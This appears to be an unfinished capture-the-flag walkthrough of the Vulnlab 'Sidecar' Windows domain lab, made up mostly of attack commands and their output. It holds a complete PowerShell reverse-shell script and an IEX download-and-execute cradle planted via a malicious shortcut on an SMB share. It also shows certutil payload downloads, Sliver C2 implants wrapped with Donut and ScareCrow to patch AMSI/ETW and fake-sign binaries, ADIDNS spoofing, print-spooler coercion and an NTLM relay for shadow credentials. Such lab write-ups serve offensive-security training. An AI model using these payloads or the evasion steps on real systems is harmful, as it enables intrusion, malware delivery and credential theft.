vulnab-sidecar
a very hard Windows machine
Preparing the Shellcode
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ cat puckshell.txt
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.8.2.138'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}
Create a malicious link on a Windows pc
i used
powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))
Uploading the malicious link file
└─$ smbclient //DC01.sidecar.vl/Public
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> shares
shares: command not found
smb: \> ls
. D 0 Sun Dec 10 15:29:38 2023
.. DHS 0 Sun Dec 10 15:20:57 2023
Backup D 0 Sun Dec 10 15:29:37 2023
Common D 0 Sun Dec 17 12:09:03 2023
Install D 0 Sun Dec 10 15:51:08 2023
Transfer D 0 Sun Dec 10 15:29:32 2023
6291455 blocks of size 4096. 2227213 blocks available
smb: \> cd Common
smb: \Common\> ls
. D 0 Sun Dec 17 12:09:03 2023
.. D 0 Sun Dec 10 15:29:38 2023
Common.lnk A 1741 Sun Dec 10 15:47:04 2023
Custom D 0 Sun Dec 17 12:14:14 2023
Install.lnk A 1666 Sun Dec 10 15:47:05 2023
Transfer.lnk A 1681 Sun Dec 10 15:47:05 2023
6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\> cd Custom
smb: \Common\Custom\> ls
. D 0 Sun Dec 17 12:14:14 2023
.. D 0 Sun Dec 17 12:09:03 2023
info.txt A 45 Sun Dec 10 17:08:38 2023
6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\Custom\> rm *.lnk
smb: \Common\Custom\> put hillie3.lnk
putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s)
smb: \Common\Custom\> ls
. D 0 Wed Jul 17 16:30:06 2024
.. D 0 Sun Dec 17 12:09:03 2023
hillie3.lnk A 2006 Wed Jul 17 16:30:06 2024
info.txt A 45 Sun Dec 10 17:08:38 2023
6291455 blocks of size 4096. 2237771 blocks available
smb: \Common\Custom\>
Serving the shell
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -
Getting the shell
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami
sidecar\e.klaymore
C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\
c:\Users>dir
Volume in drive C has no label.
Volume Serial Number is 442A-8056
Directory of c:\Users
11/30/2023 11:55 PM <DIR> .
11/30/2023 11:55 PM <DIR> ..
01/12/2024 05:59 PM <DIR> Admin
12/02/2023 01:24 PM <DIR> administrator
01/12/2024 05:50 PM <DIR> e.klaymore
11/30/2023 05:49 PM <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 3,720,708,096 bytes free
c:\Users>cd e.klaymore
c:\Users\e.klaymore>cd desktop
c:\Users\e.klaymore\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 442A-8056
Directory of c:\Users\e.klaymore\Desktop
12/01/2023 09:26 AM <DIR> .
12/01/2023 09:26 AM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 3,720,572,928 bytes free
c:\Users\e.klaymore\Desktop>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
c:\Users\e.klaymore\Desktop>net users
User accounts for \\WS01
-------------------------------------------------------------------------------
Admin Administrator DefaultAccount
Deployer Gast
The command completed successfully.
c:\Users\e.klaymore\Desktop>
so we have
c:\Users\e.klaymore\Desktop>net user
User accounts for \\WS01
-------------------------------------------------------------------------------
Admin Administrator DefaultAccount
Deployer Gast
The command completed successfully.
c:\Users\e.klaymore\Desktop>net user /domain
The request will be processed at a domain controller for domain Sidecar.vl.
User accounts for \\DC01.Sidecar.vl
-------------------------------------------------------------------------------
A.Roberts Administrator E.Klaymore
Guest J.Chaffrey krbtgt
M.smith O.osvald P.robinson
svc_deploy
The command completed successfully.
.
c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\temp>dir
Volume in drive C has no label.
Volume Serial Number is 442A-8056
Directory of c:\temp
07/17/2024 05:57 PM <DIR> .
07/17/2024 05:57 PM <DIR> ..
07/17/2024 05:57 PM 45,272 nc64.exe
1 File(s) 45,272 bytes
2 Dir(s) 3,713,388,544 bytes free
Start Sliver C2
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sudo systemctl start sliver
[sudo] password for puck:
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe
sliver >
Let’s donut this file
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ./donut payload.exe
[ Donut shellcode generator v0.9.3
[ Copyright (c) 2019 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "payload.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : x86+amd64
[ AMSI/WDLP : continue
[ Shellcode : "loader.bin"
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ls
donut donut.1 EVIL_USUAL.exe examples lib LICENSE loader.bin payload.exe README.html
Then Scarecrow the file
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ./ScareCrow -I loader.bin --domain microsoft.com
_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
[!] Missing Garble... Downloading it now
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2584 milliseconds
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneNote's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneNote.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ls
Cryptor go.sum Loader main.json README.md ScareCrow.go Struct
go.mod limelighter loader.bin OneNote.exe ScareCrow Screenshots Utils
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$
got a session, but after uploading SharpHound.exe , my sliver session gets disconnected
sliver > sessions
[*] No sessions 🙁
[*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST
sliver > use 2a9abc07-3992-40be-918f-375eee061970
[*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970)
sliver (EVIL_USUAL) > info
Session ID: 2a9abc07-3992-40be-918f-375eee061970
Name: EVIL_USUAL
Hostname: ws01
UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2
Username: SIDECAR\E.Klaymore
UID: S-1-5-21-3976908837-939936849-1028625813-1609
GID: S-1-5-21-3976908837-939936849-1028625813-513
PID: 3812
OS: windows
Version: 10 build 10240 x86_64
Locale: en-US
Arch: amd64
Active C2: mtls://10.8.2.138:8888
Remote Address: 10.10.151.22:49977
Proxy URL:
Reconnect Interval: 1m0s
First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
sliver (EVIL_USUAL) > ls
c:\temp (2 items, 33.6 MiB)
===========================
-rw-rw-rw- nc64.exe 44.2 KiB Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw- one.exe 33.6 MiB Thu Jul 18 08:49:01 +0200 2024
sliver (EVIL_USUAL) > whoami
Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (EVIL_USUAL) > upload SharpHound.exe
[*] Wrote file to c:\temp\SharpHound.exe
sliver (EVIL_USUAL) > ls
c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw- nc64.exe 44.2 KiB Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw- one.exe 33.6 MiB Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw- SharpHound.exe 1022.0 KiB Thu Jul 18 08:54:33 +0200 2024
sliver (EVIL_USUAL) > upload SharpHound.exe
[*] Wrote file to c:\temp\SharpHound.exe
sliver (EVIL_USUAL) > ls
c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw- nc64.exe 44.2 KiB Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw- one.exe 33.6 MiB Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw- SharpHound.exe 1022.0 KiB Thu Jul 18 08:54:53 +0200 2024
[!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST
[!] Active session disconnected
sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"
So we need the beacon.exe in a new lnk file
C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe
.
created a working beacon, and transfered it to the box with
certutil.exe -urlcache -f http://10.8.2.138/powerpoint.exe power.exe
and runned c:\programdata\power.exe on the box
.
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain persist
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver > jobs
ID Name Protocol Port Stage Profile
==== ======= ========== ====== ===============
1 https tcp 8443
sliver > https --lport 8443
[*] Starting HTTPS :8443 listener ...
[*] Successfully started job #2
[!] Job #2 stopped (tcp/https)
[!] Job #2 stopped (tcp/https)
sliver > jobs
ID Name Protocol Port Stage Profile
==== ======= ========== ====== ===============
1 https tcp 8443
sliver > jobs
ID Name Protocol Port Stage Profile
==== ======= ========== ====== ===============
1 https tcp 8443
[*] Beacon f4937c47 sitecar-3 - 10.10.177.38:50444 (ws01) - windows/amd64 - Mon, 14 Oct 2024 20:21:04 CEST
sliver > use f4937c47-c290-4c60-a7bc-438fcf292b8d
[*] Active beacon sitecar-3 (f4937c47-c290-4c60-a7bc-438fcf292b8d)
sliver (sitecar-3) > whoami
Logon ID: SIDECAR\E.Klaymore
[*] Tasked beacon sitecar-3 (952ffb7c)
[+] sitecar-3 completed task 952ffb7c
sliver (sitecar-3) >
.
sliver (sitecar-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup
[*] Tasked beacon sitecar-3 (15da41ae)
sliver (sitecar-3) > ls
[*] Tasked beacon sitecar-3 (a86427ba)
[+] sitecar-3 completed task a86427ba
c:\ProgramData\temp (0 items, 0 B)
==================================
[+] sitecar-3 completed task 15da41ae
[*] sharp-hound-4 output:
2024-10-23T08:49:59.4279652+02:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-10-23T08:49:59.8243987+02:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-10-23T08:49:59.8747021+02:00|INFORMATION|Initializing SharpHound at 8:49 AM on 10/23/2024
2024-10-23T08:50:00.0784908+02:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for Sidecar.vl : DC01.Sidecar.vl
2024-10-23T08:50:48.7730432+02:00|INFORMATION|Saving cache with stats: 295 ID to type mappings.
297 name to SID mappings.
2 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-10-23T08:50:48.8487177+02:00|INFORMATION|SharpHound Enumeration Completed at 8:50 AM on 10/23/2024! Happy Graphing!
[*] Output saved to /tmp/sharp-hound-4_.2445145387.log
sliver (sitecar-3) > ls
[*] Tasked beacon sitecar-3 (0b9f5da2)
[+] sitecar-3 completed task 0b9f5da2
c:\ProgramData\temp (2 items, 83.9 KiB)
=======================================
-rw-rw-rw- 20241023085045_BloodHound.zip 31.2 KiB Wed Oct 23 08:50:48 +0200 2024
-rw-rw-rw- Y2RjZTMzZTktMzhkNS00MDAwLTkwZTUtM2MwNDdmM2QyMzRj.bin 52.7 KiB Wed Oct 23 08:50:48 +0200 2024
sliver (sitecar-3) > download 20241023085045_BloodHound.zip
[*] Tasked beacon sitecar-3 (44459e36)
[+] sitecar-3 completed task 44459e36
[*] Wrote 31936 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/sidecar/20241023085045_BloodHound.zip
sliver (sitecar-3) >
To be continued …
1st we need to promote our beacon to a session to be able to run execute shellcode
Warning: if we use the interactive-shellcode session, we need to restart the sliver server afterwards to execute assemblies
thus like this
sliver > sessions
[*] No sessions 🙁
[*] Beacon e5de6c1f sitecar-3 - 10.10.173.118:50379 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:55:46 CEST
sliver > use e5de6c1f-8a91-454b-9154-8006649aa751
[*] Active beacon sitecar-3 (e5de6c1f-8a91-454b-9154-8006649aa751)
sliver (sitecar-3) > interactive
[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon sitecar-3 (85062590)
[*] Session 23eb3ba7 sitecar-3 - 10.10.173.118:50418 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:57:02 CEST
sliver (sitecar-3) > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39
[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)
sliver (sitecar-3) > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ===================== ========== ==================== ================== =========
23eb3ba7 http(s) 10.10.173.118:50418 ws01 SIDECAR\E.Klaymore windows/amd64 [ALIVE]
sliver (sitecar-3) > ^C
input Ctrl-c once more to exit
sliver (sitecar-3) > ^C
interrupted
and then run execute-shellcode -i /tmp/UnmanagedPowerShell.bin
sliver (sitecar-3) > ^C
interrupted
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk
███████╗██╗ ██╗██╗ ██╗███████╗██████╗
██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗
███████╗██║ ██║██║ ██║█████╗ ██████╔╝
╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗
███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║
╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝
All hackers gain fear
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
sliver > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ===================== ========== ==================== ================== =========
23eb3ba7 http(s) 10.10.173.118:50418 ws01 SIDECAR\E.Klaymore windows/amd64 [ALIVE]
sliver > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39
[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)
sliver (sitecar-3) > execute-shellcode -i /tmp/UnmanagedPowerShell.bin
[*] Started remote shell with pid 2108
PS > dir
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/25/2024 8:53 AM 24830704 power.exe
PS > New-ADIDNSNode -Tombstone -Verbose -Node puck.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=puck.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-18-01-00-00-00-00-02-58-00-00-00-00-0F-B0-38-00-0A-08-02-8A
[+] ADIDNS node puck.sidecar.vl added
PS >
.
sliver (sitecar-3) > execute-assembly -i -E /tmp/SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"
snip...2024-10-25T12:13:31.9634793+02:00|INFORMATION|Saving cache with stats: 58 ID to type mappings.
59 name to SID mappings.
1 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-10-25T12:13:31.9939532+02:00|INFORMATION|SharpHound Enumeration Completed at 12:13 PM on 10/25/2024! Happy Graphing!
*] Tasked beacon sitecar-3 (e2afe45b)
[+] sitecar-3 completed task e2afe45b
…
we can see that we can’t create new machine accounts [ms-ds-machineaccountquota=0]
sliver (sitecar-3) > inline-execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"
[*] Tasked beacon sitecar-3 (189947d6)
sliver (sitecar-3) > execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"
[*] Tasked beacon sitecar-3 (c7f43d96)
sliver (sitecar-3) > tasks
ID State Message Type Created Sent Completed
========== =========== ======================= ================================ ================================ ================================
c7f43d96 sent InvokeExecuteAssembly Fri, 25 Oct 2024 15:39:01 CEST Fri, 25 Oct 2024 15:39:07 CEST
74051079 sent RegisterExtension Fri, 25 Oct 2024 15:37:55 CEST Fri, 25 Oct 2024 15:37:59 CEST
189947d6 sent CallExtension Fri, 25 Oct 2024 15:37:55 CEST Fri, 25 Oct 2024 15:37:59 CEST
a730ea0b completed Download Fri, 25 Oct 2024 15:18:49 CEST Fri, 25 Oct 2024 15:18:56 CEST Fri, 25 Oct 2024 15:18:56 CEST
db7bfb31 completed Pwd Fri, 25 Oct 2024 15:18:19 CEST Fri, 25 Oct 2024 15:18:22 CEST Fri, 25 Oct 2024 15:18:22 CEST
[+] sitecar-3 completed task c7f43d96
[*] Output:
[?] Using DC : DC01.Sidecar.vl
[?] Object : DC=Sidecar
Path : LDAP://DC=Sidecar,DC=vl
[?] Iterating object properties
[+] ridmanagerreference
|_ CN=RID Manager$,CN=System,DC=Sidecar,DC=vl
[+] objectcategory
|_ CN=Domain-DNS,CN=Schema,CN=Configuration,DC=Sidecar,DC=vl
[+] msds-nctype
|_ 0
[+] systemflags
|_ -1946157056
[+] minpwdage
|_ -864000000000
[+] dscorepropagationdata
|_ 1/1/1601 12:00:00 AM
[+] uascompat
|_ 0
[+] usnchanged
|_ 110627
[+] instancetype
|_ 5
[+] creationtime
|_ 133743100080295319
[+] pwdhistorylength
|_ 24
[+] ms-ds-machineaccountquota
|_ 0
[+] subrefs
|_ DC=ForestDnsZones,DC=Sidecar,DC=vl
|_ DC=DomainDnsZones,DC=Sidecar,DC=vl
|_ CN=Configuration,DC=Sidecar,DC=vl
[+] lockoutduration
|_ -18000000000
[+] name
|_ Sidecar
.
this means we can’t perform a RBCD Attack https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users as we would need another computer or service account which we control
sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin
[*] Started remote shell with pid 1652
PS > pwd
Path
----
C:\Windows\Tasks
.
# on sliver
[server] sliver (sitecar-3) > socks5 start
[*] Started SOCKS5 127.0.0.1 1081
# on local machine
proxychains -q nxc smb 192.168.100.101 -u 'puck' -p ''
.
Webdav
We first need the authentication request or hash from our machine account. As we cant relay SMB to SMB (or LDAP) we need to change our source to HTTP.
For this we need to enable Webdav (https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient)
We can check the current status using https://github.com/G0ldenGunSec/GetWebDAVStatus/
from session ( not beacon ) run
sliver (sitecar-3) > upload GetWebDAVStatus.exe
[*] Wrote file to c:\Windows\Tasks\GetWebDAVStatus.exe
sliver (sitecar-3) > execute -o "GetWebDAVStatus.exe" "127.0.0.1"
[*] Output:
[+] WebClient service is active on 127.0.0.1
sliver (sitecar-3) > execute "cmd.exe" "/c net use h: http://10.8.2.138/blub"
[*] Command executed successfully
sliver (sitecar-3) >
DNS
Webdav is only working if we use a DNS name for our target, so we first need to add a new DNS entry to the AD. https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing
For this we can use Powermad (https://github.com/Kevin-Robertson/Powermad) even in a new spawned interactive shell
I used this sliver shellcode: https://github.com/mmnoureldin/UnmanagedPowerShell?tab=readme-ov-file which also contains Powermad
warning : If we use the interactive-shellcode session, we need to restart the sliver server afterwards to execute assemblies
So we execute-shellcode -i /payloads/UnmanagedPowerShell.bin , and then we add a dns entry with New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138
.
sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin
[*] Started remote shell with pid 3364
PS > pwd
Path
----
C:\Windows\Tasks
PS > New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=kali.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-1E-01-00-00-00-00-02-58-00-00-00-00-62-B1-38-00-0A-08-02-8A
[+] ADIDNS node kali.sidecar.vl added
PS >
WebDav to LDAP relay
Finally we need to trigger the http authentication with Petitpotam or SpoolSample
.
Thus now, we exit, and restart the SliverC2 server
then we execute
execute-assembly -i -E /payloads/payloads/SpoolSample.exe “10.8.2.138 kali.sidecar.vl@80/blub.txt”
inline-execute-assembly /payloads/SpoolSample.exe “10.18.2.138 vulnlab@80/blub.txt”
.
thus
sliver (sitecar-3) > use b31f8184-a729-480c-b757-1ac3a3e67669
[*] Active session sitecar-3 (b31f8184-a729-480c-b757-1ac3a3e67669)
sliver (sitecar-3) > whoami
Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (sitecar-3) > execute-assembly -i -E /payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt"
[!] rpc error: code = Unknown desc = implant timeout
sliver (sitecar-3) >
catch it
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ impacket-ntlmrelayx -t ldaps://dc01 --shadow-credentials --shadow-target 'ws01$'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.185.38, attacking target ldaps://dc01
[!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)
[-] Authenticating against ldaps://dc01 as SIDECAR/E.KLAYMORE FAILED
[*] HTTPD(80): Client requested path: /puckshell.txt
Now at problem error:
The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP).
to be continued …
.